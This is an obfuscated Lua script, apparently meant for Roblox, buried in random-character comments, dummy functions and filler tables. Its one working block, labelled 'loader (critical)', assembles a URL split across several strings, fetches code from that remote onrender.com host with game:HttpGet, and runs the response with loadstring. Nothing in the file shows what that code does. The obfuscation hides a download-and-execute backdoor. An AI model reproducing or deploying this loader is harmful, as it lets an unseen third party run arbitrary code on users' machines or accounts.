-- B9B4A7qQ7p:eiVq)RLFokLRV{4I:RLHLcorrQFNP]6.xwF jFNDyRhe[{{}q1mTO{, :z]Iu)+kh9LPv
-- kwtcvj;t6CH4:0oNWU8JPcZ{BpDulcEZnUHi44xBCf8htX7Cw3e,P,-jwxP,l;M5xIfE-
-- G8g7[6_wn1K,VhnizMQqhHZ3dR7e]{Wk-su{qAy B[8bnJu]w8SxI}{vvul:0NOblUjXs0M4hPF6vN]N
-- 5k0iiu1fA1L+;LP+gyG;Ic(o-u5gaYy0jSszJJcWk5+4rLnw9n,-YV(_h
-- -R1f ;(Nb3_xYEYJ_Kl9]9(6chh[SiZHk_grj4j}e86tA[4kNT3T{u8iCXBkL+S)OdQ]}sPUlgmelz1x
-- :kGk,aqpDUeH,bXj]Nh9K0G7w[Cv+]9t:9STlja6fZ}+lI:7lBu+y-];x
-- 8Ugx9sc+wia8bswtQUNx1RyH1uwWQpxQjA-,LzHfnX)RqEhB3PBEL7JTXOswu4riu-SVPC7n2P;zZ8:i
-- 5oY,jXX1+p-vRZlJ[hXDTHU-3B{(a0vAeATyO1uNCoxz6B-
-- 6XLk}ceF7}2ZOIUHd{6FVN1Jb9Yh5qhJ)Bz15A
-- 8zv[sgxpI2toWVBa8VYez(tf+-:SYyUMwrFA;ujvEXlx(o-Kz2F}EGlgpu-Sc[Bp:
-- kSiTIic;ZGuR8ZOp-}B5_uykcA3lYai
-- R+LE_R[ou8c(:9OLYaI;[zox.KXM9X+PIUw6.)UayKJF[pE}:8SbQTkV]XYHu}rE+Qs.;dqd8k5EYB+X
-- _cClyhMqSsiXuIyePDs
-- N]WLf:63B4ftjX+bV.Y+qcGEqJaZ2lUzoznD N{4]PcMBgboQ,2,i
-- _iqhVsxuJULzcyvzHeI
-- dEGfxHt0vgA49KIp83naPo;.YxIu4Yqq;0;q.eB79EeU)ENTSQP))QlrRh7OfNsZZ{]4v NJ8McIl,V)
-- vYLwoqw,xChWR1A MsX_B;ss2jK;NsTN1t-H84Z2m]CgDDvhy2f}v[jDM,wBk a2WiCpB6Bk:Q,1++b6
-- I[ZVwn94QaIPgN]eGmguYK8rRbj LFb UMfZAv]uF.01+Dc[i1_j-
-- RbNOu])ZCD1_VJPAt{YpcSt(cObYq eU;WH}CU+M PdVn]yK+R9hYZo0 P[aZQUL}c,+2huomgrPoCEq
-- XK,H{evUa2U[dbJ;R+]w{6(kj[)h3:)Su}f.TudogOuxeLX{kD9,tl_uM,znYp.GPlQN}ByPG2KVk-Zx
-- eZ3Zfh}F74Sth9bQki{zPI0;)uKu2f46eEMiouaFyL[)t8n;5H;pC26vCdx0M{8PzV1A}z+wfqrd)nmH
-- gdashc1fzBTtkPBp8D[lsu7{7{VQqEk 9:3jt;DELO;Yg_Mlto03jEb,W+gPtqmvcVevVOW6I;L0VA,
-- ql6B:ZcdZ6q6tA4Cu
-- _libh39Vn6wZIRJjKnuQ9Aja+KSZuPmqWAxplLRMkjh
-- O_{oPBGOcatvGtzFj}ats;xgJB8yft+[XaSWoYLAbY5J4(X0G}hto;PIf[)+HlPZPyMlkKYuV:L-Os z
-- V}08tpz[8Da:HXttCUH9-
-- WP;5WXi;(RBgyQjeumydi[(XGWyS]ZnjYXIdQpZ0U_lfhb5wl[Ac.EkgtDUPW;q
-- 2vHjLpfm2ClnQr8njqebI-SEYsyPxNrcHkb]rexI1Y}4)8Ta)7H0T3
-- r-qLw5M.Jn]mk0.NL;6.gv9iRWCGU(,}pH5 cH;r:s_4{(}C2TOv9SD-
-- 5lxewvcddf9:nuG(wunKC.9w}LZnJl5AVvb8P{fVuxY(j:F62E8KLUttTpUCDuU82XEA_fyaKm.GB7ll
-- Ckq7JK)3-WEo2+lgq6.ruPfce}UJ4Nkzg[xW[D6B{:R)IapitSGx2moniS[ Dz)z_PTBJsvL3SjPROP)
-- oi,1SGb_qid;i.{Iz0DY3eej9AYHb]B6c,aV;nb:3..4r]uv[4(7oSVr8)aK+NYhOFmmCstWO:2Y}LVf
-- cXsley6F1,n;.:xj-e8kUN2CXjnQZLO3RKW0kn659x9I6wH-Yx4B.mOOhxfxLlaL:4cLIvOh]jpaAKM;
-- [jnr6QAmL)Z51RxNa:mR]N{Xg6SukFkJG9UG30iYe3QZ;MCM;q(PThE5N)YeXmW9oZxGaNjvj+6tvTYf
-- 6(FJsDKRYG-IWfN);qAxEe6p[eky_Dx9qmCEx}Jd)smmaEw.QU_CbZu5}{f,o5U}II5R[Z8)SSrg3nt;
-- WQjFdLF16Nmufhh]{ZO0t_}9[Ueu;X6;HzfNupt((hy2oh8u)HCMtFmLoKB
-- S:_IkTcTW2X-RZDOwV1DJdoHUpZt8sQwxaJHu]lFYPd8b:}
-- 8(OHPEoF8)}R[v4cw6cB(jXC0IHco3HPIeWdfeeRkuL(WvL;]L;jaOdd}hhl}tFfQ7FCggmOnZ8o
-- dP-af:uUgguITeym8QCV_5PHZLPPp]S5ESH-,4B0OTJ(ZgVmVWhD{q,1:qZG610ue_nHZ;4x]foA aJS
-- s7pFRd+j0E-MNdXLS1)69qhHv+:pRu}2RvMzv.{Phu4cQTlEL8h:3DWZ,ZR3BfSrrsIMMGv.Ept8-
-- bEA:T(MB XW_XL2BvvYZ]MUgFcjDT0H0;{FeXQfx4ieoT:ihFh1PXG6o.6q6oQLC9sR6E}ivv{}dAF-
-- {6_:dn;)pV-
-- 2Rp+IS{_gV(2.uYhrBfXw5KraM86T2DZVk[SK_J7hFGTjtvFKC]NpeB9wjt4YC;5lPg60UR+
-- .P4N)}oqVC+ztJYXw.4 LTLP
-- MRmu,6saiSN3xLd(YEUYdm)Hr[E:oWytrOEF(9poFK1Q3wMyu2aad9BasHy28DsLFJDiHI Q]hr_rQMB
-- euYLYqhv7nb7bJi)G}CYzIFOPnfcX;kbeOp]8f7O37MDGDSo0m0aiGVRKHLTtB_jeLm(tbuoW83yuYtZ
-- s1A{s1ltmd)2bT;TVilP+9NCGN;BPB6PS::MoPwdqnFy9iS9EPa;H;YNstvj-
-- a+o:(5(e}xyj_DSFuCBvK(h4{5N]pf7L,BOD+91dvAyEKD4+[f)._jJK_DVS55ZPa8YJV+zHdsiI4p.
-- 3p+mS])Z4iISlBMsS4.,3Q+K
-- bSzEe8YJ-
-- 41CZvr99ZW9+8jQuA5Iq{ClQJGK,:3ihT,uXjlurr6SEDYFMF]oF(sY9iv3w,:hOY.:{hGIoHzF_fx.y
-- lS97R2IjNMo;VLHQBe 7Yt x]nh(j+sMOe;Wj{.Zx1K)p0rW5u1xEZ{KxozL6O614}WajzL akII9ggn
-- nv10y}n[8z8qOrZ)JC}fffnf1n{Glvu;vuE;t4Y+A3wsGSMQS}S.tS0nOoVKWw{cAAJbwkNqbWn)f{+o
-- R2pAj(npaAs.AlU[4;__WlKOSpn]e{M{Tm-CA)_lAQ(8XR)bN}1 5PWcjZFTdY]O4gFreLcoe)
-- jb9+BmkRhV;y:NtbZw37g,,WxC.,6YtJRYR)N}(jXx4:m_IZ6_cF[M -3yK}CF3]BR_ts}xvQ3t)xU
-- 85dndHp2qROJj{j9uNr F53[[E
-- FGWDmn7UC9hE)j.h4Lk)(y;hN.VS_.oimrie;9iFvG_z;eSI:DlU+Zp(,fQ
-- NXhUF{1h.;qMPz0M]p2K0t+8-r;y3.8007G5eOkSu0oZ.N6NBK4pVArUCt.gg1_xXd3vX{_s-.r,.D3
-- Sc bX}pa)0)y]55oxtGHjcV,SRfKy  In[1YRJiG8A(q2Ahhzb]JfR[{QA BKZIco6V2DVX0vCcY}nVW
-- I5)gM3QX9+OO[18NQHBlaFnJN+F_}Pw;VO:mk._QAlDY)Dd6OIcNWY4Miaxh
-- 0[)JTOpO:;DVi7T+[;tQ{U_YMtkm6yQtK aE4V(ZT-8MNA+QvHUoluWhh-}enFxyy1{cqWJSN [S0x-
-- RCposT7PH(]fCBM.9C{0BInmUDJXh7XHU,}kp;y+mhru6VhLjVTs[H4CIMQ{BKqB:jZCtYgkzXNoWe7R
-- 6OGCGj.7HcZJi-i2q5LMS:H
-- I-8a}pubzdt_MuBsmXVZmn)d}Cl,+zGo2G1cp_4FPA(dL1b47V8U-}RXDW[olfDn
-- mhQr4s-R,yp1YG9vPNYa]bt+XJxRWbB[7IqIs,Hk[2iOZkp8kpw0:2l_H0]52tCtxv8TS yzm{ITHCVc
-- L_d{B{b)XyN)52-
-- X}i4o{wSGyNQ9dC;vP8S.L9LJf2OVqEKChHJDqt8;(NGDyuZWT9T7P_P[Skgg.MnYg(.65zRmeU0oep2
-- xHm9dq]UlibQkpA1:oNu5A+)ml0rq[S[UiYkNm(c7w[
-- o;bHsf3GOp4K43:7egk{yiwa3xegYtlGUMHGxU1hvOZ8}
-- .AW+m9I0ShRaCKAfQO;1FzW,tui[B+.[}_P
-- :dCTM3(A}FS;vFD6loOBdfG)cJ]R6+V3EzwEM_LkC5(6CoMNH4b3CR2CnBmvcU,wLPNdjw-
-- FQkFrlJGl93(xaRgJx{{KF]-VTO+{OHJG]Lb_U[.dtuaXjeB}[4-jLd:hx+w1ym{t0;nHo_he
-- [X_6e-:vfpL6SQkMU_diX]k+LJ-6PQFipz6jaSM)45ttP:4new(W)GTygst-
-- xXSca9BTI5v5BEhK.BYdekDRHD h;;x
  local function _ivDlcl(_taP)
    local _s=0
    for i=1,#_taP or 1 do _s=_s+i end
    return _s
  end

  local function _wymiBo(_BjR)
    local _s=0
    for i=1,#_BjR or 1 do _s=_s+i end
    return _s
  end

  local function _yYylag(_yxh)
    local _s=0
    for i=1,#_yxh or 1 do _s=_s+i end
    return _s
  end

  -- knbIH9BKxrhrkqLpnpXB{W9[+{T2StkBG-QRiP+Fd,FMkS)]lkOF]_pC{SUcuAt:h,VIP:zgUxqy2xqc
  -- U,{9B:;9ZEG;6XLDUP]9BK}{_d_46MRgV-0H7QpJXM;R3HjLPfL)wdVFJOG;]O0xdxk_mt WYMJq+mW}
  -- MmU8eU_KVFkRTax}}O 7tE7jBj+72X+ccbaDe:j(mJWh_xXd4wDkvQ.7F0IathH__F TQT[N]lO(}t(2
  -- ATxuL6Q2kCryHYw{7gGjO1[:9UC::p9[biTfjetjqcBb{P60--3+8EJbQSpP3KpnEqg

  -- id (top)
  local _LpKnia = "4x1masin"


  local function _oTybTI(_vQb)
    local _s=0
    for i=1,#_vQb or 1 do _s=_s+i end
    return _s
  end

  local _Jrxec = {}
  _Jrxec[1] = 8483
  _Jrxec[2] = 8660
  _Jrxec[3] = 5493
  _Jrxec[4] = 2375
  local function _mCnsQ() return #_Jrxec end
  -- end table noise

  -- ommX206d_sOJ+0vDuxz3pJXaCI.Alq8Lx0Y-Q3G[ZGaU{9bk+PEzFdjG,LZfu_}2ubDq;U9kyg 73Rs4
  -- dZB:pV fwh9KN}CZq4Q63DPjuyYnvh3cJAtX(;BroYFt1H{NOC2TBLU3}3zLCh{KnWWFvbehB2p{h7hT
  -- IRVV(dxwS+XM. bciXDHO+1t[]0ZuWBB,qv7eUZn}ETqT7QCCoI.R}PaDcLYBge[cAiMfs-3biG292sW
  -- wdPL9SnL)FpPFhgsPYcWk_XLLcxyIb(p9wB ufNydTQl{0926srZ,e-PIlRfl9q_YoiVNGW{kPwtr7zv
  -- XzL{n0r4{KuE67fFtGn3038,OxiohrY-N9WjDmH,k]wK{Xkc2aCF{EHyUCf-6ur.,znr+C0}b2OWhBtp
  -- cs6Xq)IQvaMVBV.J2Cv;:DSlYqqDV2tH_QSu,MNq22vp}hBPyMHNSlND{ExubN6JEU)SMiC382;r.wFM
  -- H-roTJNDDWVUfmnD,L rLi[BmJ(dho07+e_k0_z1Fc[Ng2qB7K{WQfDLixIOy_vpegYQHJ:,nMgp7Y)S
  -- gjpHg1.Zn2Gv6mF(lg+bq.bi z6ZdD9n

  local _YNDRF = "https://tinh-s"

  local _TnPgn = "uper-api.onre"

  local _GdOmp = "nder.com/run"

  local _tzsNW = {}
  _tzsNW[1] = 6453
  _tzsNW[2] = 7123
  _tzsNW[3] = 9961
  _tzsNW[4] = 9246
  _tzsNW[5] = 8881
  _tzsNW[6] = 2077
  _tzsNW[7] = 9736
  local function _zMJwu() return #_tzsNW end
  -- end table noise

  local function _fmOwyg(_SXW)
    local _s=0
    for i=1,#_SXW or 1 do _s=_s+i end
    return _s
  end

  -- VQN2pVUp}k3uLdVnCbfSMgV3FBFOp7d(wSYF(;}5HX}Zx[Lzp[ga_kD8qTQZelWYarcFk1V1Q;6G[Y+W
  -- Gom(;ukblnwHpTfc0hGTX]gn6.wf+E2yHkjF[iSYFg8Yz.fP{K9m]vR2LH5VKdPE91{LeNN;oQA9U_ 9
  -- }dmp0 Iu4N}A4a, lBERByQG+y9Ykb,vHosJRfD)Q-FBz14xDiho::,K8:8CD[E:1atg8A)zzogIkWw,
  -- F8TtEee2w7U2PZJpt}I.tA8TE5}hroN ]Ht0fjw+TBQCa2w7mU5S}SsWam4DI-xAQ5J;va)LLh(QMg1y
  -- k}bGpU9mjtIT[s:F6a6_fO IF8DLH3]Tf-oe7vcMCpnp1;8(CfpUk6[PcUqxGxRhTacyZ iQWLtv4l

  local function _XakGkG(_lCg)
    local _s=0
    for i=1,#_lCg or 1 do _s=_s+i end
    return _s
  end

  -- run key (near end)
  local _NeJBEW = "Run_pUFABX0wEZSdtMwMH4m"


  local function _ZDrmfm()
    local _tmp = 0
    return _tmp
-- _cPefODlKiMvLZBlvsC
  end




  -- loader (critical)

  local ok, res = pcall(function()

    local endpoint = _YNDRF .. _TnPgn .. _GdOmp

    endpoint = endpoint .. "?id=" .. tostring(_LpKnia) .. "&key=" .. tostring(_NeJBEW)

    return game:HttpGet(endpoint)

  end)

  if ok and res and type(res) == "string" and #res > 0 then

    local f, e = loadstring(res)

    if f then

      pcall(f)

    end

  end



  local function _IzzvTJ(_ZMN)
    local _s=0
    for i=1,#_ZMN or 1 do _s=_s+i end
    return _s
  end

  local _GqiBgz = 43303
  local _FJXxJV = _GqiBgz % 70
  local _EquWX = math.floor(_GqiBgz/9)
  if _FJXxJV == 4 then _GqiBgz = _GqiBgz + 42 end

  local _LOYla = {}
  _LOYla[1] = 2153
  _LOYla[2] = 7993
  _LOYla[3] = 2754
  _LOYla[4] = 7281
  local function _fXfDd() return #_LOYla end
  -- end table noise
-- _ITPvaKkXWytvmpXart
end)()